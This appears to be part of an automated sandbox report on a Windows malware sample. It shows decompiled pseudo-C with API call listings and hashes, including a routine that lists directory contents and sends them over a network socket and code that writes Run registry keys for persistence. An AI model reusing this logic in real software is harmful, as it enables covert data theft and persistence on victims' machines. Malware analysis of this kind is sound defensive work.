                                    0x0044a3ee
                                    0x0044a3f0
                                    0x00000000
                                    0x00000000
                                    0x0044a3fc
                                    0x0044a402
                                    0x0044a403
                                    0x0044a405
                                    0x0044a412
                                    0x0044a415
                                    0x00000000
                                    0x00000000
                                    0x0044a417
                                    0x0044a41b
                                    0x0044a45f
                                    0x0044a45f
                                    0x0044a461
                                    0x0044a464
                                    0x00000000
                                    0x00000000
                                    0x0044a467
                                    0x0044a46d
                                    0x0044a46f
                                    0x00000000
                                    0x00000000
                                    0x0044a471
                                    0x0044a471
                                    0x0044a474
                                    0x00000000
                                    0x0044a474
                                    0x0044a42a
                                    0x0044a42f
                                    0x0044a432
                                    0x0044a434
                                    0x00000000
                                    0x00000000
                                    0x0044a436
                                    0x0044a436
                                    0x0044a439
                                    0x0044a43c
                                    0x0044a43f
                                    0x0044a442
                                    0x0044a442
                                    0x0044a445
                                    0x0044a448
                                    0x0044a448
                                    0x0044a455
                                    0x0044a458
                                    0x0044a45a
                                    0x0044a45a
                                    0x0044a407
                                    0x0044a407
                                    0x0044a40d
                                    0x0044a476
                                    0x0044a476
                                    0x0044a476
                                    0x00000000
                                    0x0044a405
                                    0x0044a3a1
                                    0x0044a3a1
                                    0x00000000

                                    APIs
                                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A397
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A3E8
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A4A8
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                    • String ID:
                                    • API String ID: 2829624132-0
                                    • Opcode ID: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
                                    • Instruction ID: b8f74ff5e519f84a9dadc1d099471af389f48447beb5eaa2b6f47629cec96164
                                    • Opcode Fuzzy Hash: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
                                    • Instruction Fuzzy Hash: 8061C275980207ABFB289F25CD86B7A77A8EF04304F10807BE905C6681E77CDD61CB5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004423BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043DD1F,?,00000004), ref: 0044240D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: GetLocaleInfoEx
                                    • API String ID: 2299586839-2904428671
                                    • Opcode ID: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
                                    • Instruction ID: 96fabd543f80631915bdd4e6a3d78e1bd42830cecee988cc8e1c6fddece1edfb
                                    • Opcode Fuzzy Hash: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
                                    • Instruction Fuzzy Hash: 89F0F631640318BBDB11AF61DC02F6E7F65EF04B02F50402AFC0567292CA799E259A9D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00442424, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,00435774), ref: 00442463
                                    Strings
                                    • GetSystemTimePreciseAsFileTime, xrefs: 0044243F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Time$FileSystem
                                    • String ID: GetSystemTimePreciseAsFileTime
                                    • API String ID: 2086374402-595813830
                                    • Opcode ID: 276e188142dcba8552c0c5fd32c55eefcf231bfd4f8efebcb1a64ff43a26958e
                                    • Instruction ID: 09645e63eb2cf1ef7a1b77b1c5df07c01e3b03da8d5135b28a525b7943d7118a
                                    • Opcode Fuzzy Hash: 276e188142dcba8552c0c5fd32c55eefcf231bfd4f8efebcb1a64ff43a26958e
                                    • Instruction Fuzzy Hash: 93E05530B00718A787116F21AC02A3EBB60CB04F03B90017FFC095B282DAB94E059ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004153F5, Relevance: 3.2, APIs: 2, Instructions: 245fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 90%
                                    			E004153F5(char* __edx, void* __eflags, char _a8) {
				struct _WIN32_FIND_DATAW _v1028;
				char _v1036;
				char _v1064;
				char _v1088;
				void* _v1092;
				char _v1100;
				char _v1116;
				void* _v1120;
				char _v1128;
				char _v1136;
				char _v1152;
				char _v1156;
				char _v1160;
				void* _v1164;
				char _v1172;
				char _v1176;
				void* _v1188;
				char _v1196;
				void* _v1200;
				void* _v1204;
				char _v1208;
				char _v1220;
				char _v1224;
				char _v1228;
				char _v1232;
				char _v1236;
				char _v1240;
				char _v1252;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t63;
				int _t85;
				int _t91;
				void* _t102;
				void* _t108;
				void* _t109;
				char* _t113;
				void* _t115;
				void* _t116;
				void* _t130;
				void* _t133;
				void* _t228;
				void* _t229;
				signed int _t234;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;

				_t242 = __eflags;
				_t213 = __edx;
				_push(_t139);
				_t63 = L00401F95( &_a8);
				E004042A6( &_a8,  &_v1100, 4, 0xffffffff);
				_t237 = (_t234 & 0xfffffff8) - 0x4b4;
				E004020EC(_t139, _t237, __edx, _t242, 0x46c238);
				_t238 = _t237 - 0x18;
				E004020EC(_t139, _t238, __edx, _t242,  &_v1116);
				E00417478( &_v1252, _t213);
				_t239 = _t238 + 0x30;
				_t228 =  *_t63 - 0x19;
				if(_t228 == 0) {
					E004020D5(_t139,  &_v1220);
					_t213 = 0x46c880;
					L00407514( &_v1172, 0x46c880, __eflags, L"\\*");
					_t229 = FindFirstFileW(L00401EEB( &_v1172),  &_v1028);
					__eflags = _t229 - 0xffffffff;
					if(__eflags == 0) {
						L14:
						E004020EC(_t139, _t239 - 0x18, _t213, __eflags,  &_v1220);
						_push(0x5d);
						L00404AA4(_t139, 0x46c918, _t213, __eflags);
						L00401EF0();
						L00401FC7();
						goto L15;
					}
					E0040427F(_t139,  &_v1196,  &(_v1028.cFileName));
					_t213 = ".";
					_t85 = E004074E4(__eflags);
					_t139 = _t85;
					L00401EF0();
					__eflags = _t85;
					if(__eflags != 0) {
						L00401FD1( &_v1228, ".", _t229, E004020AB(_t139,  &_v1196, ".", __eflags,  &_v1028, 0x250));
						L00401FC7();
					}
					while(1) {
						__eflags = FindNextFileW(_t229,  &_v1028);
						if(__eflags == 0) {
							goto L14;
						}
						E0040427F(_t139,  &_v1196,  &(_v1028.cFileName));
						_t213 = L"..";
						_t91 = E004074E4(__eflags);
						_t139 = _t91;
						L00401EF0();
						__eflags = _t91;
						if(__eflags != 0) {
							E00403436(E004020AB(_t139,  &_v1196, L"..", __eflags,  &_v1028, 0x250));
							L00401FC7();
						}
					}
					goto L14;
				} else {
					_t244 = _t228 == 1;
					if(_t228 == 1) {
						_t102 = E004172DA( &_v1152, L00401E49( &_v1232, _t213, _t244, 1));
						E00403030( &_v1176, L00407514( &_v1128, 0x46c880, _t244, "\\"), _t102);
						L00401EF0();
						L00401EF0();
						E004020D5(_t139,  &_v1224);
						_t108 = L00401EEB( &_v1176);
						_t213 =  &_v1224;
						_t109 = L004179DC(_t108,  &_v1224);
						_t245 = _t109;
						if(_t109 != 0) {
							_t113 = L00401F95(L00401E49(0x46c578,  &_v1224, _t245, 0x1b));
							_t246 =  *_t113 - 1;
							if( *_t113 == 1) {
								_t130 = E00402489();
								L00405A7C( &_v1028, L00401F95(0x46c560), _t130);
								_t133 = E00402489();
								L00401FD1( &_v1240, _t213, 0x46c560, L00405BA4(_t139,  &_v1036, _t213,  &_v1156, L00401F95( &_v1228), _t133));
								L00401FC7();
							}
							_t115 = L00401E49( &_v1232, _t213, _t246, 2);
							_t116 = L00401E49( &_v1236, _t213, _t246, 0);
							_t213 = L00402F93(_t139,  &_v1160, L00402F93(_t139,  &_v1136, L00402F93(_t139,  &_v1088, L00402F93(_t139,  &_v1064, L00402FB7( &_v1208, L00401E49( &_v1240, _t213, _t246, 1), 0x46c238), _t246, _t116), _t246, 0x46c238), _t246, _t115), _t246, 0x46c238);
							L00402F93(_t139, _t239 - 0x18, _t122, _t246,  &_v1220);
							_push(0x5e);
							L00404AA4(_t139, 0x46c918, _t122, _t246);
							L00401FC7();
							L00401FC7();
							L00401FC7();
							L00401FC7();
							L00401FC7();
						}
						L00401FC7();
						L00401EF0();
					}
					L15:
					L00401E74( &_v1252, _t213);
					L00401FC7();
					return L00401FC7();
				}
			}




















































                                    0x004153f5
                                    0x004153f5
                                    0x00415404
                                    0x00415407
                                    0x0041541d
                                    0x00415422
                                    0x0041542d
                                    0x00415432
                                    0x0041543f
                                    0x00415448
                                    0x0041544d
                                    0x00415450
                                    0x00415453
                                    0x00415620
                                    0x0041562a
                                    0x00415633
                                    0x00415651
                                    0x00415653
                                    0x00415656
                                    0x0041571d
                                    0x00415727
                                    0x0041572c
                                    0x00415733
                                    0x0041573c
                                    0x00415745
                                    0x00000000
                                    0x00415745
                                    0x00415668
                                    0x0041566d
                                    0x00415674
                                    0x0041567d
                                    0x0041567f
                                    0x00415684
                                    0x00415686
                                    0x004156a3
                                    0x004156ac
                                    0x004156ac
                                    0x0041570e
                                    0x00415719
                                    0x0041571b
                                    0x00000000
                                    0x00000000
                                    0x004156c5
                                    0x004156ca
                                    0x004156d1
                                    0x004156da
                                    0x004156dc
                                    0x004156e1
                                    0x004156e3
                                    0x00415700
                                    0x00415709
                                    0x00415709
                                    0x004156e3
                                    0x00000000
                                    0x00415459
                                    0x00415459
                                    0x0041545c
                                    0x00415473
                                    0x00415496
                                    0x004154a0
                                    0x004154a9
                                    0x004154b2
                                    0x004154bb
                                    0x004154c0
                                    0x004154c6
                                    0x004154cb
                                    0x004154cd
                                    0x004154e1
                                    0x004154e6
                                    0x004154e9
                                    0x004154f2
                                    0x00415507
                                    0x00415510
                                    0x00415536
                                    0x0041553f
                                    0x0041553f
                                    0x00415555
                                    0x00415562
                                    0x004155bc
                                    0x004155c0
                                    0x004155c6
                                    0x004155cd
                                    0x004155d6
                                    0x004155df
                                    0x004155eb
                                    0x004155f7
                                    0x00415600
                                    0x00415600
                                    0x00415609
                                    0x00415612
                                    0x00415612
                                    0x0041574a
                                    0x0041574e
                                    0x0041575a
                                    0x0041576d
                                    0x0041576d

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 0041564B
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00415717
                                      • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                      • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$CreateFirstNextchar_traits
                                    • String ID:
                                    • API String ID: 3100282071-0
                                    • Opcode ID: 3673a11da3fe41b4d4a25fb8ab1b3bde120ba6189303c758b554a664e1c5c213
                                    • Instruction ID: fc299df16d418c96fbb3dc7ae8f09247cd9b87a8735511f9070920f35661dee3
                                    • Opcode Fuzzy Hash: 3673a11da3fe41b4d4a25fb8ab1b3bde120ba6189303c758b554a664e1c5c213
                                    • Instruction Fuzzy Hash: DB81A6311183409BC314F722C856EEF73A9AF91348F40453FF596671E2EF389A49CA9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004061C3, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E004061C3(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				struct _WIN32_FIND_DATAW _v668;
				void* __ebx;
				void* __esi;
				int _t29;
				void* _t34;
				void* _t49;
				void* _t73;
				void* _t74;

				_t73 = FindFirstFileW(L00401EEB( &_a4),  &_v668);
				_t77 = _t73 - 0xffffffff;
				if(_t73 != 0xffffffff) {
					E004020D5(_t49,  &_v28);
					E0040427F(_t49,  &_v52,  &(_v668.cFileName));
					_t71 = ".";
					_t29 = E004074E4(__eflags);
					_t50 = _t29;
					L00401EF0();
					__eflags = _t29;
					if(__eflags != 0) {
						L00401FD1( &_v28, ".", _t73, E004020AB(_t50,  &_v52, ".", __eflags,  &_v668, 0x250));
						L5:
						L00401FC7();
					}
					__eflags = FindNextFileW(_t73,  &_v668);
					if(__eflags != 0) {
						_t34 = E004020AB(_t50,  &_v76, _t71, __eflags,  &_v668, 0x250);
						_t71 =  &_v28;
						L00401FD1( &_v28,  &_v28, _t73, E004074F0(_t50,  &_v52,  &_v28, __eflags, _t34));
						L00401FC7();
						goto L5;
					}
					E004020EC(_t50, _t74 - 0x18, _t71, __eflags,  &_v28);
					_push(0x50);
					L00404AA4(_t50, 0x46c2e8, _t71, __eflags);
					L00401FC7();
				} else {
					E0041739C(_t49, _t74 - 0x18,  &_a4);
					_push(0x54);
					L00404AA4(_t49, 0x46c2e8,  &_a4, _t77);
				}
				return L00401EF0();
			}














                                    0x004061e4
                                    0x004061e6
                                    0x004061e9
                                    0x0040620c
                                    0x0040621b
                                    0x00406220
                                    0x00406227
                                    0x0040622f
                                    0x00406231
                                    0x00406236
                                    0x00406238
                                    0x00406252
                                    0x00406291
                                    0x00406291
                                    0x00406291
                                    0x004062a4
                                    0x004062a6
                                    0x0040626b
                                    0x00406271
                                    0x00406281
                                    0x00406289
                                    0x00000000
                                    0x0040628e
                                    0x004062b1
                                    0x004062b6
                                    0x004062bd
                                    0x004062c5
                                    0x004061eb
                                    0x004061f3
                                    0x004061f8
                                    0x004061ff
                                    0x004061ff
                                    0x004062d7

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 004061DE
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040629E
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNextsend
                                    • String ID:
                                    • API String ID: 4113138495-0
                                    • Opcode ID: 1d816a77bb2de0c84dabe2ff0fac833b535f603402e02c0b0ac7444ea8aed486
                                    • Instruction ID: 05b06413529d47d56342622e5ae20bd3e82c8e6dc30fd3fa753989dbabbba416
                                    • Opcode Fuzzy Hash: 1d816a77bb2de0c84dabe2ff0fac833b535f603402e02c0b0ac7444ea8aed486
                                    • Instruction Fuzzy Hash: 442198319102099ACB14FBA6CC96DEF7778AF55304F40017FF906761D2EF385A49CA99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004223C0, Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: L/B
                                    • API String ID: 0-202356071
                                    • Opcode ID: 76de492c9c07f0eb7c158ab6622f4411f8f17a6eccbc349bd2954d67055dc0a1
                                    • Instruction ID: af44c839d919a06cb4036c0461bacdbed32545edb78db0b7c7cb8e0092a3767b
                                    • Opcode Fuzzy Hash: 76de492c9c07f0eb7c158ab6622f4411f8f17a6eccbc349bd2954d67055dc0a1
                                    • Instruction Fuzzy Hash: 12E1B330A10028AFCB08CF5DE9A287E73F1FB49301755416EE582E7391DA74FA12EB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044A21B, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                    • EnumSystemLocalesW.KERNEL32(0044A343,00000001,00000000,?,0043E2C1,?,0044A970,00000000,?,?,?), ref: 0044A28D
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
                                    • Instruction ID: fef6e57728511f2b9b1dd238f7a777dd7648a2b970c096311ec5bc0c4a713da2
                                    • Opcode Fuzzy Hash: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
                                    • Instruction Fuzzy Hash: 3F114C372007055FEB189F39C8916BBB791FF80359B14442DE98647740E7B6B952DB44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044A2B6, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                    • EnumSystemLocalesW.KERNEL32(0044A593,00000001,?,?,0043E2C1,?,0044A934,0043E2C1,?,?,?,?,?,0043E2C1,?,?), ref: 0044A302
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
                                    • Instruction ID: b467c6c7c7f8ac7ca1ad2f3a7ac430e87e8f1bd3a8912e360415dfb464baff1b
                                    • Opcode Fuzzy Hash: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
                                    • Instruction Fuzzy Hash: 28F022323403045FEB149F399C81A6A7B95FF80368B14443EF9418B690E6B6DC419A04
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044A1D0, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                    • EnumSystemLocalesW.KERNEL32(0044A127,00000001,?,?,?,0044A992,0043E2C1,?,?,?,?,?,0043E2C1,?,?,?), ref: 0044A207
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
                                    • Instruction ID: a7fadff6d2ca21f630832dc779862bf22c9b6182ed5b4a5894b7910ac126a48e
                                    • Opcode Fuzzy Hash: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
                                    • Instruction Fuzzy Hash: 1FF0553A38030557EB049F75DC49B6BBFA0FFC1719F06405AEA058B690C67AD942CB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D1E5, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00411E51,0046C238,0046C5B4,0046C238,00000000,0046C238,00000000,0046C238,3.2.1 Pro), ref: 0040D1F9
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
                                    • Instruction ID: ac7816e6a697d777cf06a73d6884089d523ece1dfcb51b9ad9a20d9ec724333c
                                    • Opcode Fuzzy Hash: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
                                    • Instruction Fuzzy Hash: 47D05E7074021DBBEA14D6959C0AEAB7B9CD701B66F0001A6BE04D72C0E9E1AE04C7E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043820B, Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                                    • Instruction ID: 656339de93b15354355cc6fc116552e81dda14c8a7802dd6a12fd3361ec49b7a
                                    • Opcode Fuzzy Hash: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                                    • Instruction Fuzzy Hash: AC515170204B495BEF38456844457BFE3989B6E744F18298FFC82D7382CE5EED06825E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004340D5, Relevance: .3, Instructions: 331COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                    • Instruction ID: 89fb698572b7cf86533d0eea82b05fcf403d339a8e9ac14319646ffa1aaa429a
                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                    • Instruction Fuzzy Hash: 67C1D8322060534ADF2D463984341BFBAA09EE57B1B1A276FD4B3CF2C4EF18E964D524
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043843A, Relevance: .2, Instructions: 237COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
                                    • Instruction ID: b367387755e38c2acd2464c16e73056793f51d4de4b8bca9bcadcc32440fe761
                                    • Opcode Fuzzy Hash: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
                                    • Instruction Fuzzy Hash: 84615B7120070A77DE389A2888927BFE3949B6D304F14391FF942DB781EE1DDD42825E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00423098, Relevance: .2, Instructions: 195COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                                    • Instruction ID: 6a2ad8edffecebfcaae903e9719156c7a0c76254d9b187d9e67c469d6c3393be
                                    • Opcode Fuzzy Hash: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                                    • Instruction Fuzzy Hash: CB613C31E0021AABDF08DFB9D5815EFB7B2FF8C304F50812AE425BB250DA746A058B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040F15D, Relevance: .1, Instructions: 90COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
                                    • Instruction ID: 7a46c63e6297807c5de7f1130092129a1d39734970edeb025e6968c5830d1d5b
                                    • Opcode Fuzzy Hash: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
                                    • Instruction Fuzzy Hash: 8F315A75A00115AFCB20CF59CD81B5AB7A9FF48354F1580B6ED04AB382D375EA64CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B0E2, Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 280registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 98%
                                    			E0040B0E2(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				E0041015B();
				if( *0x46a9d4 != 0x30) {
					L00409D73();
				}
				_t243 =  *0x46bd6b - 1; // 0x0
				if(_t243 == 0) {
					E0041537E(_t243);
				}
				if( *0x46ba75 != 0) {
					L00417754(L00401EEB(0x46c0e0));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x46bb02 - 1; // 0x1
				if(_t245 == 0) {
					L00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401EEB(0x46c4e8));
				}
				_t246 =  *0x46bafb - 1; // 0x0
				if(_t246 == 0) {
					L00410D5C(0x80000002, _t231, L00401EEB(0x46c4e8));
				}
				_t247 =  *0x46bb00 - 1; // 0x0
				if(_t247 == 0) {
